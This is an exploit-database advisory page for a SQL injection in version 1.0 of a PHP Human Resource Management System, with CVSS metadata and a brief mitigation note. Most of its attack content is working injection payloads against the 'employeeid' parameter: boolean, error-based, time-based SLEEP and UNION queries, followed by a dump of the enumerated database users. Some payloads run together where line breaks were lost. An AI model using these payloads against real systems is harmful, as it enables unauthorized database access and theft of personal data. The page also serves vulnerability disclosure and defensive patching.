Human Resource Management System - SQL Injection

vendor:

Human Resource Management System

by:

Srikar

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Human Resource Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro 10.0.19044 + XAMPP V3.3.0

2024

Human Resource Management System – SQL Injection

The Human Resource Management System version 1.0 is vulnerable to SQL Injection through the 'employeeid' parameter. By using crafted payloads like 'employeeid=2' AND 9667=9667-- NFMg', an attacker can manipulate the SQL queries to extract sensitive information from the database. Successful exploitation allows unauthorized access to the database.

Mitigation:

To mitigate this issue, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. Regular security audits and code reviews are recommended to identify and fix such vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Human Resource Management System - SQL Injection
# Date: 13-01-2024
# Exploit Author: Srikar ( Exp1o1t9r )
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
# Vulnerable URL and Parameter:URL:


Parameter: employeeid=2 The following payloads successfully identified SQL injection
vulnerabilities:
employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
ALL SELECT
NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
- *

# Response:MySQL: 10.4.32-MariaDB
Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*